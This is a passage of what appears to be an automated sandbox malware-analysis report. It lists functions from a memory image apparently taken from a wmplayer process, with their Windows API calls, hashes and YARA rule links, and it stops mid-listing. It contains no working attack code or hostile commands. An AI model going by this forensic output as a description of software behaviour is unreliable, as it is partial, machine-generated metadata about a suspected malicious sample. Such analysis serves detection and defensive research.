                                                                                            • API String ID: 3510742995-2766056989
                                                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                            Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004144E7
                                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                            • memset.MSVCRT ref: 0041451A
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1127616056-0
                                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                            Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                            • malloc.MSVCRT ref: 00417459
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                            • free.MSVCRT ref: 0041747F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2605342592-0
                                                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                            Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2678498856-0
                                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                            Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Item
                                                                                            • String ID:
                                                                                            • API String ID: 3888421826-0
                                                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                            Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00417B7B
                                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3727323765-0
                                                                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                            Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F673
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                            Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                            Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 764393265-0
                                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                            Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$System$File$LocalSpecific
                                                                                            • String ID:
                                                                                            • API String ID: 979780441-0
                                                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                            Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                            • String ID:
                                                                                            • API String ID: 1386444988-0
                                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                            Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcschr$memcpywcslen
                                                                                            • String ID: "
                                                                                            • API String ID: 1983396471-123907689
                                                                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                            Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemcpy
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2789212964-323797159
                                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                            Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf
                                                                                            • String ID: %%-%d.%ds
                                                                                            • API String ID: 3988819677-2008345750
                                                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                            Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E770
                                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendmemset
                                                                                            • String ID: F^@
                                                                                            • API String ID: 568519121-3652327722
                                                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                            Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PlacementWindowmemset
                                                                                            • String ID: WinPos
                                                                                            • API String ID: 4036792311-2823255486
                                                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                            Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                            • API String ID: 2773794195-880857682
                                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                            Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID:
                                                                                            • API String ID: 438689982-0
                                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                            Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$memset
                                                                                            • String ID:
                                                                                            • API String ID: 1860491036-0
                                                                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                            Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040A908
                                                                                            • free.MSVCRT ref: 0040A92B
                                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 726966127-0
                                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                            Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                            • free.MSVCRT ref: 0040B201
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040B224
                                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 726966127-0
                                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                            Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
